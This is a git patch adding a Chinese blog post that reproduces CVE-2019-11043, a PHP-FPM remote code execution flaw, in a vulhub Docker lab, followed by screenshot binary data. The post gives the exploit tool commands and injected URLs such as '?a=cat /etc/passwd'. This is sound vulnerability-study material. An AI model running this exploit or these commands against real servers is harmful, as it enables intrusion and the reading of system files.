From 004df094764b8f172268e19cece6464d60999bce Mon Sep 17 00:00:00 2001 From: LYT <1929596302@qq.com> Date: Wed, 11 Sep 2024 14:31:36 +0800 Subject: [PATCH] =?UTF-8?q?post:PHP-FPM=20=E8=BF=9C=E7=A8=8B=E4=BB=A3?= =?UTF-8?q?=E7=A0=81=E6=89=A7=E8=A1=8C=E6=BC=8F=E6=B4=9E?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...47\350\241\214\346\274\217\346\264\236.md" | 55 ++++++++++++++++++ .../2024-09-10/iShot_2024-09-10_22.15.45.png | Bin 0 -> 38396 bytes .../2024-09-10/iShot_2024-09-10_22.16.48.png | Bin 0 -> 250855 bytes 3 files changed, 55 insertions(+) create mode 100644 "_posts/2024-09-10-\346\274\217\346\264\236\345\244\215\347\216\260-PHP-FPM-\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214\346\274\217\346\264\236.md" create mode 100644 assets/img/2024-09-10/iShot_2024-09-10_22.15.45.png create mode 100644 assets/img/2024-09-10/iShot_2024-09-10_22.16.48.png diff --git "a/_posts/2024-09-10-\346\274\217\346\264\236\345\244\215\347\216\260-PHP-FPM-\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214\346\274\217\346\264\236.md" "b/_posts/2024-09-10-\346\274\217\346\264\236\345\244\215\347\216\260-PHP-FPM-\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214\346\274\217\346\264\236.md" new file mode 100644 index 0000000..03cf97f --- /dev/null +++ "b/_posts/2024-09-10-\346\274\217\346\264\236\345\244\215\347\216\260-PHP-FPM-\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214\346\274\217\346\264\236.md" @@ -0,0 +1,55 @@ +--- +title: 漏洞复现-PHP-FPM 远程代码执行漏洞 +description: CVE-2019-11043 从一个小的内存溢出到代码执行 +author: #有默认值 +date: 2024-09-10 10:13:14 +0800 +categories: [漏洞复现] +tags: [漏洞复现,RCE] # TAG names should always be lowercase +pin: # 默认false,可填true +math: true +mermaid: true +# image: +# path: /assets/bar/home.png +# lqip: data:image/webp;base64,UklGRpoAAABXRUJQVlA4WAoAAAAQAAAADwAABwAAQUxQSDIAAAARL0AmbZurmr57yyIiqE8oiG0bejIYEQTgqiDA9vqnsUSI6H+oAERp2HZ65qP/VIAWAFZQOCBCAAAA8AEAnQEqEAAIAAVAfCWkAALp8sF8rgRgAP7o9FDvMCkMde9PK7euH5M1m6VWoDXf2FkP3BqV0ZYbO6NA/VFIAAAA +# alt: # 图片名 +--- + +## 构建 + +``` shell +cd vulhub/php/CVE-2019-11043 +docker-compose up -d +``` +cd +## 漏洞原理 +https://github.com/vulhub/vulhub/blob/master/php/CVE-2019-11043/README.zh-cn.md + +https://blog.orange.tw/posts/2019-10-an-analysis-and-thought-about-recently/ + +https://cloud.tencent.com/developer/article/1530703 + +这是一个非常有趣的漏洞!从一个小的内存缺陷到代码执行。它结合了二进制和网络技术, + +## PoC(Proof of Concept) 验证漏洞存在的代码 +作者利用了双缓冲机制,如果缓冲区到达末尾(pos > end),PHP-FPM 会创建一个新的缓冲区,并将前一个缓冲区放入结构成员 fcgi_data_seg->next 中。 +若有 PHPINFO 页面。获取/info.php/%0a.php ,观察 $_SERVER['PATH_INFO'] 是否损坏! +... +影响版本:PHP 5.6-7.x,Nginx>=0.7.31 +## Exp(Exploit)进行实际的攻击利用 +安装漏洞利用工具,和利用 +```shell +git clone https://github.com/neex/phuip-fpizdam.git +cd phuip-fpizdam +go run . "http://your-ip:8080/index.php" +``` +![](../assets/img/2024-09-10/iShot_2024-09-10_22.16.48.png) +访问http://your-ip:8080/index.php?a=id,即可查看到id命令已成功执行 +![](../assets/img/2024-09-10/iShot_2024-09-10_22.15.45.png) +注意:只有部分PHP-FPM子进程受到了污染,因此请尝试几次以执行RCE命令,会出现成功执行 +```shell +/index.php?a=cat /etc/passwd +``` + + +## 复现总结 +无法直接通过url传入反弹shell命令,执行失败 diff --git a/assets/img/2024-09-10/iShot_2024-09-10_22.15.45.png b/assets/img/2024-09-10/iShot_2024-09-10_22.15.45.png new file mode 100644 index 0000000000000000000000000000000000000000..e95ec282207767cc382fa6cefb84e7e5c6d1ed70 GIT binary patch literal 38396 zcmaI6b9AQ7(mtAGV%xTD+qRv_#I`23ZJQH26We&=Ol
WWlWltO^Tg#`ftL6DIaR|Nq9j{^Y#g@uOvJLBq1cmo0gTVo|ArYs{S
zMy%}Y@ZHMR0t7@lGBq7aSxpD)=e5r%35oEDs_1nOL;|Web&xA^YC;IIYy^x5jXS26
zBSS>Q&(5N1QrJ4##1_&h2$Tk6qXY>N11z|LqDCa_fveB^YoRYMm+g<5LE6E
z`~l1XP*J#DOp^p=krXOil&y%wA@x07Q=VUOo|!KhFNTtml3F7=-wWZ5zQ@XUOgUv%
zvwpDVOT&_@C2`RNl9Sj`5|A1Y3lR5EC69-hD>?J?M0aQEi}i~8%YIVJrM9G4OgNis
zO=?bXPCSkE79vwaqC;B1P^7C$^2l^Zcri#Nu%+CmnT^*bRj2SV0O+`Al~UUhky2+9
zcE|(7KeOHwz!dwH`?Ug#l?xh-c9RA`FeH|Xz17y19+$o?O)iN@)D$I>sGJVw=
z+DnZOSe%zl8*;|$_$H-&Z}Eo9PAo=p9G$#Nx>LyERRGt_W!l-|+NyBwIby*s@ORqW
zP;?uVjJ-QJjVhH>^BJTd85po$XvX=gq&(m_KaO1aah~T?&%+d({agacRY}u~6J1*G
z1!32<;g_R9K{F&0&Y6AtJ8PTVkgcPn<2C-
zon4Sbj{SzUs{|gYm&18JJdd%e3k9M6sB#m)zoxp-gFvb&^V**k>mjH34%z!I@(j!~
z)Z$VE+a4;Z-lJ(-znlEkwX^-1bT7Kpmoaa$4`faU`P5q2sl_324}Gn}565M<$4?3W
zzRzzG(j4uh8jKHdujP5WaeVi=_ThI93;eA*_swOwU7JUb4(*SBi)?vSj`*ElTl*hU
z#tI=;Y(|sN$|%NbCW$It%^)c^fs#6jS|06gd}o`$+KsLDU4=S%qsF>r|Ca7eajqW=
zzMWJrhjiY$*JD`B&V5`HyUFP-i2=3r9oB}8OD*;5f2=X(UApT0haTTvO#24P{a&-_
z2~btmcC8VKl$x2<5T(@H=YG6E1Ppw4bNc&a_
&vyA#b<
z-I^{TroQATKF0CzZcI8P@3LYING@vgA=FVUL8J#D01lrXmCDX{`Fk;!GEh&1EmIJx1tuDz)SLQF
zlpRVDioFQNgj`umc>`!e&j?=dO;dx=!I>8u
zp)jEfBG{z$R`k);$bJs3r7SdW?UB)9Mbf*t@?IVYrvmVaHY2}o#8cV@JR^V|B?s|IF#PF@pK6E1NxtfT1t
zW*cu~0Gf2vs3U<{I$JnjJHSSF>t~Smbptncs~=+R+<&jflzjtbqI{9Bkz$^dp3+T%
zO_